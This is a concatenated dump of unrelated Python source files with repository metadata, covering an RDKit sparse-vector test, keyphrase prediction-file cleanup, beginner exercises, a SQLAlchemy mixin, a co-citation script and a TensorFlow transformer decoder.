      tf.close()  # redundant: the with-statement closes the file as well
    with io.BytesIO(buf) as f:
      v3 = pickle.load(f)
    self.assertTrue(v3 == v1)

  def test3Pickle2(self):
    """Same round-trip checks as test3Pickle1, for IntSparseIntVect.
    """
    l = 1 << 21
    v1 = ds.IntSparseIntVect(l)
    self.assertRaises(IndexError, lambda: v1[l + 1])
    v1[0] = 1
    v1[2] = 2
    v1[1 << 12] = 3
    self.assertTrue(v1 == v1)
    v2 = pickle.loads(pickle.dumps(v1))
    self.assertTrue(v2 == v1)
    v3 = ds.IntSparseIntVect(v2.ToBinary())
    self.assertTrue(v2 == v3)
    self.assertTrue(v1 == v3)
    #pickle.dump(v1,file('isiv.pkl','wb+'))
    with open(os.path.join(RDConfig.RDBaseDir, 'Code/DataStructs/Wrap/testData/isiv.pkl'),
              'r') as tf:
      buf = tf.read().replace('\r\n', '\n').encode('utf-8')
      tf.close()  # redundant: the with-statement closes the file as well
    with io.BytesIO(buf) as f:
      v3 = pickle.load(f)
    self.assertTrue(v3 == v1)

  def test4Update(self):
    """UpdateFromSequence must increment counts like repeated item assignment.
    """
    v1 = ds.IntSparseIntVect(5)
    self.assertRaises(IndexError, lambda: v1[6])
    v1[0] = 1
    v1[2] = 2
    v1[3] = 3
    self.assertTrue(v1 == v1)
    v2 = ds.IntSparseIntVect(5)
    v2.UpdateFromSequence((0, 2, 3, 3, 2, 3))
    self.assertTrue(v1 == v2)

  def test5Dice(self):
    """Dice similarity: identity case plus a hand-computed cross pair.
    """
    v1 = ds.IntSparseIntVect(5)
    v1[4] = 4
    v1[0] = 2
    v1[3] = 1
    self.assertTrue(feq(ds.DiceSimilarity(v1, v1), 1.0))
    v1 = ds.IntSparseIntVect(5)
    v1[0] = 2
    v1[2] = 1
    v1[3] = 4
    v1[4] = 6
    v2 = ds.IntSparseIntVect(5)
    v2[1] = 2
    v2[2] = 3
    v2[3] = 4
    v2[4] = 4
    # Expected value worked out by hand; symmetry is also checked.
    self.assertTrue(feq(ds.DiceSimilarity(v1, v2), 18.0 / 26.))
    self.assertTrue(feq(ds.DiceSimilarity(v2, v1), 18.0 / 26.))

  def test6BulkDice(self):
    """Bulk Dice results must match the element-wise computation.
    """
    sz = 10
    nToSet = 5
    nVs = 6
    import random
    vs = []
    # Random (unseeded) vectors: the test compares two code paths, so the
    # actual values do not matter, only their agreement.
    for i in range(nVs):
      v = ds.IntSparseIntVect(sz)
      for j in range(nToSet):
        v[random.randint(0, sz - 1)] = random.randint(1, 10)
      vs.append(v)
    baseDs = [ds.DiceSimilarity(vs[0], vs[x]) for x in range(1, nVs)]
    bulkDs = ds.BulkDiceSimilarity(vs[0], vs[1:])
    for i in range(len(baseDs)):
      self.assertTrue(feq(baseDs[i], bulkDs[i]))

  def test6BulkTversky(self):
    """Tversky(0.5, 0.5) must equal Dice, and Tversky(1, 1) must equal Tanimoto,
    both pairwise and in bulk.
    """
    sz = 10
    nToSet = 5
    nVs = 6
    import random
    vs = []
    for i in range(nVs):
      v = ds.IntSparseIntVect(sz)
      for j in range(nToSet):
        v[random.randint(0, sz - 1)] = random.randint(1, 10)
      vs.append(v)
    baseDs = [ds.TverskySimilarity(vs[0], vs[x], .5, .5) for x in range(1, nVs)]
    bulkDs = ds.BulkTverskySimilarity(vs[0], vs[1:], 0.5, 0.5)
    diceDs = [ds.DiceSimilarity(vs[0], vs[x]) for x in range(1, nVs)]
    for i in range(len(baseDs)):
      self.assertTrue(feq(baseDs[i], bulkDs[i]))
      self.assertTrue(feq(baseDs[i], diceDs[i]))
    bulkDs = ds.BulkTverskySimilarity(vs[0], vs[1:], 1.0, 1.0)
    taniDs = [ds.TanimotoSimilarity(vs[0], vs[x]) for x in range(1, nVs)]
    for i in range(len(bulkDs)):
      self.assertTrue(feq(bulkDs[i], taniDs[i]))
    taniDs = ds.BulkTanimotoSimilarity(vs[0], vs[1:])
    for i in range(len(bulkDs)):
      self.assertTrue(feq(bulkDs[i], taniDs[i]))

  def test7ToList(self):
    """list(bv) and bv.ToList() must agree with a plain Python list of the values."""
    l = [0]*2048
    nbits = 2048
    bv = ds.IntSparseIntVect(nbits)
    for j in range(nbits):
      x = random.randrange(0, nbits)
      l[x] = x
      bv[x] = x
    l2 = list(bv)
    l3 = bv.ToList()
    self.assertEqual(l, l2)
    self.assertEqual(l, l3)
if __name__ == '__main__':
  # Run the SparseIntVect test suite when executed directly.
  unittest.main()
| [
"[email protected]"
] | |
f37b4202698b801244e4f37eb349143a2286421f | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /070_oop/007_exceptions/_exercises/templates/GoCongr/035_warnings.py | 64f70487a6f6966148382366c83ea4f50b5aa248 | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 682 | py | # # w____
# ________ w____
#
#
# ___ input_body_parameter name unit supposed_maximum
# parameter _ fl.. inp.. 'Enter your @ (in @): '.f.... n.. u...
# __ ? < _ 0:
# r____ V... n.. + ' cannot be negative')
# __ ? > s...
# w____.w... 'suspiciously large value of ' + n..
# r_ ?
#
#
# ___ input_mass
# r_ i... n... _'mass' u... _'kg' s.... _ 100
#
#
# ___ input_height
# r_ i... n.. _ 'height' u... _ 'm' s.... _ 2
#
#
# ___ calculate_bmi mass height
# r_ m... / h.. ** 2)
#
#
# ___ main
# mass _ i._m.
# height _ i._h.
# bmi _ c... mass height
# print('Your body mass index is', ?
#
#
# __ _______ __ ____
# ?
| [
"[email protected]"
] | |
f6373c989bd22ce2c8959f9b63d9482b3dba981a | 271dbb5f0c23ae40f19a8df7dd3f15a44fbe5ae1 | /it-king/day01/while.py | 5c0bdb341ea377ada180d290ccf004639cd7d5df | [] | no_license | obligate/python3-king | a4d1c5c145c3b1c42efe059cf2bbd797d0b3c528 | 2b31400468c7a2621f29f24f82e682eb07c0e17d | refs/heads/master | 2020-05-02T11:45:16.218771 | 2019-03-27T08:05:39 | 2019-03-27T08:05:39 | 177,938,256 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 94 | py | # Author: Peter
count = 0
while True:
print('count:', count)
count = count + 1
| [
"[email protected]"
] | |
b0084b0539780db5582ce0d7f2cdd843f26384e9 | 6defeaa9e3eff61cd861c855ed2f65db2a457564 | /onmt/keyphrase/shrink_pred_files.py | b0f94a88ab0e0f5a110485f683a9c904dd885b63 | [
"MIT"
] | permissive | memray/OpenNMT-kpg-release | 50439d2a58d4499b3a4b1d1fdb586d266c4367e7 | d16bf09e21521a6854ff3c7fe6eb271412914960 | refs/heads/master | 2023-08-17T14:32:04.442881 | 2023-01-31T03:24:46 | 2023-01-31T03:24:46 | 213,238,221 | 222 | 34 | MIT | 2023-07-22T18:03:01 | 2019-10-06T20:23:17 | Jupyter Notebook | UTF-8 | Python | false | false | 6,961 | py | # -*- coding: utf-8 -*-
"""
Some pred files use up too much space, e.g. /zfs1/pbrusilovsky/rum20/kp/OpenNMT-kpg/output/keyphrase/meng17-one2seq/meng17-one2seq-kp20k-topmodels/meng17-one2seq-fullbeam/meng17-one2seq-beam50-maxlen40/pred/kp20k-meng17-verbatim_prepend-rnn-BS64-LR0.05-Layer1-Dim150-Emb100-Dropout0.0-Copytrue-Reusetrue-Covtrue-PEfalse-Contboth-IF1_step_95000/kp20k.pred is 8.3GB, beam=10 size=2.0GB.
So this
"""
import json
import os
__author__ = "Rui Meng"
__email__ = "[email protected]"
if __name__ == '__main__':
    # Previously used experiment roots, kept for quick switching:
    # root_path = ' /zfs1/pbrusilovsky/rum20/kp/OpenNMT-kpg/output/keyphrase/'
    # root_path = '/zfs1/pbrusilovsky/rum20/kp/transfer_exps/kp/'
    # root_path = '/zfs1/pbrusilovsky/rum20/kp/transfer_exps/kp_o2o/'
    # root_path = '/zfs1/hdaqing/rum20/kp/fairseq-kpg/exps/'
    # root_path = '/zfs1/hdaqing/rum20/kp/fairseq-kpg/exps/kp_fewshot10k'
    # root_path = '/zfs1/hdaqing/rum20/kp/transfer_exps/kp_fewshot-v2'
    root_path = '/zfs1/hdaqing/rum20/kp/transfer_exps/bart_DAFT-v1-DA1e6_FT1e5'
    print(root_path)

    # Expected number of prediction lines per test set.  A file is only
    # touched when its name maps to one of these datasets, and a .pred file
    # is only shrunk once it has exactly this many lines (decoding finished).
    dataset_line_counts = {
        'kp20k': 19987,
        # 'kp20k_valid2k': 2000,
        'inspec': 500,
        'krapivin': 460,
        'nus': 211,
        'semeval': 100,
        # 'duc': 308,
        'kp20k_test': 19987,
        'openkp_test': 6614,
        'kptimes_test': 10000,
        'jptimes_test': 10000,
        'stackex_test': 16000,
        'kp20k_valid2k_test': 2000,
        'openkp_valid2k_test': 2000,
        'kptimes_valid2k_test': 2000,
        'stackex_valid2k_test': 2000,
    }

    total_size_shrinked = 0
    for root, dirs, files in os.walk(root_path, topdown=True):
        for filename in files:
            # --- Delete evaluation reports outright ---
            if filename.endswith('.report'):
                # filename pattern: <model>-data_<dataset>.report
                dataset_name = filename[:-7].split('-')[-1][5:]
                if dataset_name in dataset_line_counts:
                    report_path = os.path.join(root, filename)
                    print('Deleting .report: [%s] %s' % (dataset_name, report_path))
                    ori_size = os.stat(report_path).st_size // 1024 // 1024
                    print('\t file size = %d MB' % (ori_size))
                    total_size_shrinked += ori_size
                    os.remove(report_path)
            if filename.endswith('.report.txt'):
                # filename pattern: <dataset>.report.txt
                dataset_name = filename[:-11]
                if dataset_name in dataset_line_counts:
                    report_path = os.path.join(root, filename)
                    print('Deleting .report: [%s] %s' % (dataset_name, report_path))
                    ori_size = os.stat(report_path).st_size // 1024 // 1024
                    print('\t file size = %d MB' % (ori_size))
                    total_size_shrinked += ori_size
                    os.remove(report_path)
            # --- Reduce .pred file size ---
            if not filename.endswith('.pred'):
                continue
            dataset_name = filename[:-5].split('-')[-1][5:]
            if dataset_name not in dataset_line_counts:
                continue
            pred_path = os.path.join(root, filename)
            print('Shrinking .pred: [%s] %s' % (dataset_name, pred_path))
            ori_size = os.stat(pred_path).st_size // 1024 // 1024
            print('\t file size = %d MB' % (ori_size))
            # Keep only the first line's content; the rest are just counted
            # to make sure decoding over this dataset has completed.
            with open(pred_path, 'r') as pred_file:
                lines = [l if lid == 0 else '' for lid, l in enumerate(pred_file)]
            if len(lines) != dataset_line_counts[dataset_name]:
                # prediction still ongoing, skip
                continue
            pred_dict = json.loads(lines[0])
            if 'attns' not in pred_dict:
                # not a model output file
                continue
            if pred_dict['src'] is None:
                # 'src' already nulled -> file was shrunk earlier, skip
                continue
            tmp_pred_path = pred_path + '.tmp'
            # BUG FIX: the original never closed tmp_pred_file, so st_size
            # below could be measured on an unflushed file, the handle
            # leaked, and the remove/rename raced an open handle.  Using
            # `with` guarantees both files are closed (and flushed) first.
            with open(tmp_pred_path, 'w') as tmp_pred_file, \
                    open(pred_path, 'r') as pred_file:
                for lid, line in enumerate(pred_file):
                    try:
                        pred_dict = json.loads(line)
                    except ValueError:
                        # Malformed JSON line: copy it through unchanged.
                        tmp_pred_file.write(line.strip() + '\n')
                        print("Error occurs while loading line %d in %s" % (lid, pred_path))
                        continue
                    # Null out the bulky per-example fields; scores and the
                    # remaining prediction text are kept for evaluation.
                    pred_dict['src'] = None
                    pred_dict['preds'] = None
                    # pred_dict['pred_scores'] = None
                    pred_dict['attns'] = None
                    pred_dict['copied_flags'] = None
                    pred_dict['ori_pred_sents'] = None
                    pred_dict['ori_pred_scores'] = None
                    pred_dict['ori_preds'] = None
                    pred_dict['dup_pred_tuples'] = None
                    tmp_pred_file.write(json.dumps(pred_dict) + '\n')
            print('\tDumped to: ' + pred_path + '.tmp')
            new_size = os.stat(tmp_pred_path).st_size // 1024 // 1024
            print('\t new file size = %d MB' % (new_size))
            print('\t reduced size = %d MB' % (ori_size - new_size))
            total_size_shrinked += (ori_size - new_size)
            # replace the original file to release space
            os.remove(pred_path)
            os.rename(tmp_pred_path, pred_path)

    print('Total shrinked size = %d MB' % (total_size_shrinked))
| [
"[email protected]"
] | |
d4a331fd126d3de9e4c2126c8127d132a767d784 | 501176c17ecfda9fc2641c407b044b51364afa8e | /BootCamp/python/example/example.py | c4a02a67d17d6beae597df85db0c307a24e907bd | [] | no_license | melissa-koi/betterbuys | fcc6d6bfc1f37a644258d7bcf52eb93597674fd6 | edc40636c14ee341835bd8f77fd9ae91767b220a | refs/heads/main | 2023-05-26T13:59:59.503289 | 2021-06-10T05:35:43 | 2021-06-10T05:35:43 | 375,577,831 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,146 | py | # import sys
#
# name = sys.argv[1]
# print("How old are you?")
# age = int(input())
#
# print(name)
# print(age)
# height = 69
# if height > 70:
# print("You are really tall")
# elif height > 60:
# print("You are of average height")
# else:
# print("You are really short")
# name = ""
# list_a = []
#
# if list_a:
# print("True")
# else:
# print("False")
# list_a = range(0, 5)
# print(list_a)
# for i in range(0, 7):
# print("I would love " + str(i) + " cookies")
# numbers = [1, 2, 3, 4, 5]
# for i in numbers:
# if i % 2 == 0:
# print(i)
# players = 11
# while players >= 5:
# print("The remaining players are ", players)
# players -= 1
# number = 0
# while True:
# print("I love candy " + str(number))
# number += 1
# if number == 7:
# break
# numTaken = [3, 5, 7, 11, 13]
# print("Available Numbers")
#
# for i in range(1, 21):
# if i in numTaken:
# continue # or break
# print(i)
# my_list = []
# my_other_list = list()
# list_a = ["a", "b", "c", "d"] # list of strings
# list_b = [1, 2, 3, 4, 5, 6] # list of numbers
# list_c = [1, "west", 34, "longitude"] # mixed list
# list_d = [ ["a","b","c","d"],[1,2,3,4,5,6],[1,"west",34,"longitude"]] # nested list
#
# list_a.extend(list_b)
# print(list_a)
# print(list_b)
# my_cat = {'name': 'Mr.Sniffles', 'age': 18, 'color': 'black'}
#
# print(my_cat['name'])
# print(my_cat)
#
# print(list(my_cat.keys()))
# print("Enter a string")
# input_string = input()
# characters = {}
#
# for character in input_string:
# characters.setdefault(character, 0)
# characters[character] = characters[character] + 1
#
# print(characters)
# print('What is your name?')
# name = input()
# print('How old are you?')
# age = input()
# print(f"My name is {name} and i am {age} years old")
# name = "James"
# age = 19
# weight = '79' # Kilograms
#
# age_weight_ratio = int(weight)/age
# age_weight_ratio2 = float(weight)/age
#
# print(age_weight_ratio)
# print(age_weight_ratio2)
def fun_a(a=1, b=4):
    """Print the sum of `a` and `b` (defaults give 1 + 4 = 5)."""
    total = a + b
    print(total)


fun_a()
def fun_b():
    """Placeholder function; intentionally does nothing."""
    return None
def fun_c(a, b):
    """Return the sum of `a` and `b`."""
    result = a + b
    return result
# Renamed from `sum`: the original binding shadowed the builtin sum().
total = fun_c(5, 8)
print(total)
| [
"[email protected]"
] | |
2102df986d73ba8bded087840712c105503e1d9e | 1e660c91d0ae300ad6907a97941441fc8e73d5dc | /api/models/mixins.py | aa77a920c2b5911c3ee17653ec4e9346cb85c4ce | [] | no_license | SEUNAGBEYE/Stocky | 55d65e8ba7e7ff5228863e3c242c6499b2078ca7 | b2129b0a166a08d14c809cf4e0d711a7c469c91c | refs/heads/develop | 2023-02-23T11:26:46.160005 | 2019-04-01T04:11:06 | 2019-04-01T04:11:06 | 178,017,757 | 0 | 0 | null | 2023-02-07T22:21:11 | 2019-03-27T15:00:34 | Python | UTF-8 | Python | false | false | 2,735 | py | """Module for generic model operations mixin."""
from .config import db
class ModelMixin:
    """Mixin class with generic model operations.

    Assumes the inheriting class is an SQLAlchemy model (it relies on the
    shared `db.session` and the class-level `query` attribute).

    NOTE(review): `re` and `ValidationError` (used in get_or_404) are not
    imported in this module -- confirm they are provided elsewhere,
    otherwise get_or_404 raises NameError instead of the intended 404.
    """

    def save(self):
        """
        Save a model instance

        Returns:
            The saved instance (self), after committing the session.
        """
        db.session.add(self)
        db.session.commit()
        return self

    def update_(self, **kwargs):
        """
        Updates a record in place and commits the session.

        Args:
            kwargs (dict): Key-value pair of the attributes to update

        Returns:
            None (the instance itself is mutated).
        """
        for field, value in kwargs.items():
            setattr(self, field, value)
        db.session.commit()

    @classmethod
    def get(cls, id):
        """
        Gets a record by id

        Args:
            id (int): Unique identifier for the recod

        Returns:
            The found record, or None when no row matches.
        """
        return cls.query.get(id)

    @classmethod
    def get_or_404(cls, id):
        """
        Gets a record or raise a 404-style validation error

        Args:
            id (int): Unique identifier for the recod

        Returns:
            (dict) The found record

        Raises:
            ValidationError: when the record does not exist; the message is
            the class name split into words (e.g. 'UserRole' -> 'user role').
        """
        record = cls.get(id)
        if not record:
            # The regex inserts a space before each internal capital-letter
            # run and lowercases it to build a human-readable model name.
            raise ValidationError(
                {
                    'message':
                    f'{re.sub(r"(?<=[a-z])[A-Z]+",lambda x: f" {x.group(0).lower()}" , cls.__name__)} not found'  # noqa
                },
                404)
        return record

    def delete(self):
        """
        Soft delete a model instance.
        """
        # TODO: not implemented -- calling delete() currently does nothing.
        pass

    @classmethod
    def count(cls):
        """
        Returns the number of records for this model's base query.
        """
        return cls.query.count()

    @classmethod
    def find_or_create(cls, data, **kwargs):
        """
        Finds a model instance or creates it

        Args:
            data (dict): details of the record to be created
            kwargs: filter criteria used for the lookup (may differ from
                `data`, which is only used when creating).

        Returns:
            (dict) The found record or newly created record
        """
        instance = cls.query.filter_by(**kwargs).first()
        if not instance:
            instance = cls(**data).save()
        return instance

    @classmethod
    def bulk_create(cls, objects):
        """
        Saves a list of records (dict) to database in a single commit

        Args:
            objects (list): List of records to be saved to database

        Returns:
            (list): A list of the newly created records
        """
        resource_list = [cls(**item) for item in objects]
        db.session.add_all(resource_list)
        db.session.commit()
        return resource_list
| [
"[email protected]"
] | |
aa0da87f9190e8296e72752194ba5b8957bb36fa | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/meetup/2b4a2462e86149f3a94264f7c35aef7a.py | ac0930b773da25cb6f1e91324fa9ea02ed62294a | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 614 | py | from calendar import monthrange
from datetime import date
def meetup_day(year, month, day_of_the_week, which):
    """Return the date of the requested weekday meetup in a month.

    Args:
        year, month: the calendar month to search.
        day_of_the_week: full English weekday name, e.g. 'Monday'.
        which: 'teenth', 'last', or an ordinal like '1st'..'5th'
            (only the leading digit is used).

    Returns:
        datetime.date of the matching day.

    BUG FIX: the original comprehension iterated `daye_` but filtered on the
    undefined name `date_`, raising NameError on every call.
    """
    month_length = monthrange(year, month)[1]
    days_in_month = (date(year, month, day)
                     for day in range(1, month_length + 1))
    candidates = [d for d in days_in_month
                  if d.strftime('%A') == day_of_the_week]
    if which == 'teenth':
        # Exactly one weekday of each name falls in the 13..19 range.
        return next(d for d in candidates if 13 <= d.day <= 19)
    if which == 'last':
        return candidates[-1]
    return candidates[int(which[0]) - 1]
def day_name(date_):
    """Return the full weekday name (e.g. 'Monday') for the given date."""
    # format() delegates to date.__format__, which applies strftime codes.
    return format(date_, '%A')
| [
"[email protected]"
] | |
5a3533fe380107f7a518cfd59cc2bc0bf7a77c6a | 7556542c8c6ae157542300ce45388a8cb0213edb | /cocitation/co-citation-finding.py | 7e0a03491b4cf421e14f206531faccb9b8550960 | [
"Apache-2.0"
] | permissive | hyyc116/Therapies_finding | 2229f567c157d17a7ed947d62a78d3487151540c | 1ee36190e5b85ac89d2836c67ab60c1168c3b1b0 | refs/heads/master | 2021-01-17T12:46:32.491077 | 2017-04-06T20:28:45 | 2017-04-06T20:28:45 | 84,074,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,042 | py | #coding:utf-8
import sys
sys.path.append(".")
sys.path.append("..")
from tools.xml_parser import *
reload(sys)
sys.setdefaultencoding('utf-8')
import re
from collections import defaultdict
import json
#Get references
def parse_references_with_index(indexpath):
    """For each .nxml path listed in `indexpath`, print one line to stdout:
    '<doi>\t<reference titles joined as sentences>'.

    Python 2 code (print statement, str.encode on output).  Progress is
    reported to stderr every 100 input lines.
    """
    count =0
    for path in open(indexpath):
        count+=1
        # Skip index entries that are not PMC .nxml documents.
        if not path.strip().endswith('.nxml'):
            continue
        if count%100==1:
            sys.stderr.write('{:}\n'.format(count))
        path = path.strip()
        doc = parse_doc(path)
        titles = []
        for title in parse_pmc_references(doc):
            titles.append(title)
        # Join reference titles into a pseudo-paragraph, collapse whitespace.
        headers = re.sub(r"\s+",' ','. '.join(titles)+".")
        doi = parse_pmc_doi(doc)
        print doi+"\t"+headers.encode('utf-8')
#get body text
def parse_indexes(indexpath,nplist):
    """Count, for every noun phrase in `nplist`, the documents (under the
    paths listed in `indexpath`) that mention both it and Parkinson's
    disease.

    Side effects: writes the mapping {np: [paths]} to 'parkinson-tf.dict'
    in the working directory and prints '<np>\t<doc count>' per phrase
    (Python 2 print statement).  Progress goes to stderr.
    """
    count=0
    find_doc_count=0
    tf_dic=defaultdict(list)
    for path in open(indexpath):
        count+=1
        if not path.strip().endswith('.nxml'):
            continue
        if count%10==1:
            sys.stderr.write('PROGRESS:{:},'.format(count))
            sys.stderr.write('find {:} docs.\n'.format(find_doc_count))
        path = path.strip()
        # Cheap raw-text pre-filter before running the XML parser.
        content = open(path).read().lower()
        if "parkinson's disease" not in content:
            continue
        find_doc_count+=1
        content = parse_body_abstext(path)
        # Normalise: hyphens become spaces, whitespace collapsed, lowercase.
        content = re.sub(r'\s+'," ",content.replace('-'," ").lower())
        for np in nplist:
            if np in content:
                tf_dic[np].append(path)
    open("parkinson-tf.dict",'w').write(json.dumps(tf_dic))
    for np in tf_dic.keys():
        # set() de-duplicates paths recorded more than once per phrase.
        print np+"\t"+str(len(set(tf_dic[np])))
def parse_body_abstext(path):
    """Return the body text of a PMC .nxml document as one string: all
    paragraphs under <sec> elements, whitespace-collapsed and space-joined.
    """
    doc = parse_doc(path)
    content = doc.select('sec p')
    # abstext = doc.select('abstract')[0].get_text()
    ps=[]
    for p in content:
        ps.append(re.sub(r'\s+'," ",p.get_text()))
    return " ".join(ps)
def score_therapies(df_path,tf_path):
    """Score therapies by df/tf ratio and print them in descending order.

    Args:
        df_path: TSV file, column 0 = therapy name, column 2 = df count.
        tf_path: TSV file, column 0 = therapy name, column 1 = tf count.

    Prints (Python 2) one line per therapy: name, score, df, tf.
    Therapies missing from the tf file get a pseudo-count of 0.5 so the
    division never hits zero.
    """
    df_dict=defaultdict(int)
    tf_dict = defaultdict(int)
    for line in open(df_path):
        splits = line.split("\t")
        # Same normalisation as elsewhere: hyphens -> spaces, collapse ws.
        therapy = re.sub(r'\s+'," ",splits[0].replace("-"," "))
        df_dict[therapy]=int(splits[2])
    for line in open(tf_path):
        splits = line.split("\t")
        tf_dict[splits[0]] = int(splits[1])
    results=defaultdict(float)
    for t in df_dict.keys():
        tf = tf_dict.get(t,0.5)
        # float() keeps the division real under Python 2 integer semantics.
        results[t]=df_dict[t]/float(tf)
    for k,v in sorted(results.items(),key=lambda x:x[1],reverse=True):
        print "{:}\t{:.5f}\t{:}\t{:}".format(k,v,df_dict[k],tf_dict.get(k,0.5))
if __name__=="__main__":
    # Dispatch on the sub-command given as the first CLI argument:
    #   ref   <indexpath>            -> print "<doi>\t<reference titles>" per paper
    #   tf    <indexpath> <dfpath>   -> count term frequencies for the NP list
    #   score <dfpath> <tfpath>      -> rank therapies by df/tf ratio
    clas = sys.argv[1]
    if clas=='ref':
        # BUG FIX: the index path is the second argument; the original passed
        # sys.argv[1] (the literal sub-command 'ref') as the file path.
        parse_references_with_index(sys.argv[2])
    elif clas=='tf':
        indexpath=sys.argv[2]
        dfpath=sys.argv[3]
        # Normalise each NP the same way document text is normalised.
        nplist = [re.sub(r'\s+'," ",line.strip().split('\t')[0].replace("-"," ")) for line in open(dfpath)]
        parse_indexes(indexpath,nplist)
    elif clas=='score':
        score_therapies(sys.argv[2],sys.argv[3])
| [
"[email protected]"
] | |
804d141858f3dc22514a6b54505eebf25a0e5c38 | e6c65e2e354336a4bea5b6a4ccbccd3682915fe2 | /out-bin/py/google/fhir/models/run_locally.runfiles/pypi__tensorboard_1_12_1/tensorboard/plugins/image/images_plugin.py | 0f7921e81efab27bdfd237ae85d1b4f5e13351ae | [
"Apache-2.0"
] | permissive | rasalt/fhir-datalab | c30ab773d84983dd04a37e9d0ddec8bf2824b8a4 | 3e329fc8b4226d3e3a4a7c23c306a86e7a9ea0de | refs/heads/master | 2021-10-09T05:51:04.593416 | 2018-12-21T18:11:03 | 2018-12-22T05:38:32 | 162,744,237 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | /home/rkharwar/.cache/bazel/_bazel_rkharwar/0ddaa3627472ad9d1367a008236ce2f5/external/pypi__tensorboard_1_12_1/tensorboard/plugins/image/images_plugin.py | [
"[email protected]"
] | |
1487f463b36ac15949892d9d13ee5fa6dc48ad37 | c573cac75d4e34263fa29d3efccb76199be0af98 | /4/A.py | c3fa91a5b7637c8e587fb001b43db17bffc6807c | [] | no_license | se2313se/Ya.algorithms_training | b197a0d1f786b0a250de9420965f48436b92ca6a | c52a0ca53f8a807abc943fa60b5b178754118141 | refs/heads/main | 2023-06-08T23:03:40.853383 | 2021-06-24T17:21:07 | 2021-06-24T17:21:07 | 380,001,410 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | with open('input.txt', 'r', encoding='utf8') as f:
synonyms = dict()
n = int(f.readline())
for i in range(n):
tempWord, tempSynonyms = f.readline().split()
synonyms[tempWord] = tempSynonyms
synonyms[tempSynonyms] = tempWord
print(synonyms[f.readline().strip()])
| [
"[email protected]"
] | |
5f3b77b8ea7b33ecee62dff19499387e3da1e40e | 63f85ffae77a564ca296777b294ab3e4d2957ce9 | /tfSeq2SeqModels/decoders/transformer_decoder.py | 78583e920e9c7fd481e1b006c929fe6d30e9bc45 | [] | no_license | chenxinglili/eastonCode | 0c89789e2656b9236d773424973d933ac9045697 | 0334a41f6df7bb38a18a6918dfebd189c64395e8 | refs/heads/master | 2020-06-26T10:11:02.112948 | 2019-07-02T13:42:36 | 2019-07-02T13:42:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,892 | py | '''@file rnn_decoder.py
the while_loop implementation'''
import tensorflow as tf
import logging
from .rna_decoder import RNADecoder
from tfSeq2SeqModels.tools.utils import dense
from tfModels.tensor2tensor import common_attention
from ..tools.utils import residual, multihead_attention, ff_hidden
inf = 1e10
class Transformer_Decoder(RNADecoder):
    """Transformer decoder for a CTC-trained acoustic model whose output
    distribution has been shrunk by removing blank frames. The decoder
    operates on the shrunk distribution, which makes decoding a sequence
    labeling problem; the training targets are generated by OCD.
    """

    def __init__(self, args, is_train, global_step, embed_table=None, name=None):
        super().__init__(args, is_train, global_step, embed_table, name)
        # Decoder hyper-parameters; dropout is disabled outside training.
        self.num_blocks = args.model.decoder.num_blocks
        self.num_cell_units = args.model.decoder.num_cell_units
        self.attention_dropout_rate = args.model.decoder.attention_dropout_rate if is_train else 0.0
        self.residual_dropout_rate = args.model.decoder.residual_dropout_rate if is_train else 0.0
        self.num_heads = args.model.decoder.num_heads
        self.size_embedding = args.model.decoder.size_embedding
        # 'glu' selects a gated (x * sigmoid(y)) feed-forward activation.
        self._ff_activation = (lambda x, y: x * tf.sigmoid(y)) \
            if args.model.decoder.activation == 'glu' else tf.nn.relu  # glu
        self.softmax_temperature = args.model.decoder.softmax_temperature
        self.lambda_lm = self.args.lambda_lm

    def decode(self, encoded, len_encoded, decoder_input):
        """
        Teacher-forced decoding pass, used for MLE training.
        Returns per-step logits and their argmax token ids.
        """
        decoder_output = self.decoder_impl(decoder_input, encoded, len_encoded)

        logits = tf.layers.dense(
            decoder_output,
            self.args.dim_output,
            use_bias=False,
            name='decoder_fc')
        preds = tf.to_int32(tf.argmax(logits, axis=-1))

        return logits, preds

    def decoder_with_caching(self, encoded, len_encoded):
        """
        Greedy search with per-block activation caching; used for
        self-learning training or inference.
        """
        batch_size = tf.shape(encoded)[0]
        token_init = tf.fill([batch_size, 1], self.start_token)
        logits_init = tf.zeros([batch_size, 1, self.dim_output], dtype=tf.float32)
        finished_init = tf.zeros([batch_size], dtype=tf.bool)
        len_decoded_init = tf.ones([batch_size], dtype=tf.int32)
        cache_decoder_init = tf.zeros([batch_size, 0, self.num_blocks, self.num_cell_units])
        encoder_padding = tf.equal(tf.sequence_mask(len_encoded, maxlen=tf.shape(encoded)[1]), False)  # bool tensor
        encoder_attention_bias = common_attention.attention_bias_ignore_padding(encoder_padding)

        def step(i, preds, cache_decoder, logits, len_decoded, finished):
            # One greedy decoding step: embed history, run cached decoder,
            # take the argmax token and extend the hypotheses.
            preds_emb = self.embedding(preds)
            decoder_input = preds_emb

            decoder_output, cache_decoder = self.decoder_with_caching_impl(
                decoder_input,
                cache_decoder,
                encoded,
                encoder_attention_bias)

            cur_logit = tf.layers.dense(
                inputs=decoder_output[:, -1, :],
                units=self.dim_output,
                activation=None,
                use_bias=False,
                name='decoder_fc')

            cur_ids = tf.to_int32(tf.argmax(cur_logit, -1))
            preds = tf.concat([preds, cur_ids[:, None]], axis=1)
            logits = tf.concat([logits, cur_logit[:, None]], 1)

            # Whether sequences finished.
            has_eos = tf.equal(cur_ids, self.end_token)
            finished = tf.logical_or(finished, has_eos)
            len_decoded += 1-tf.to_int32(finished)

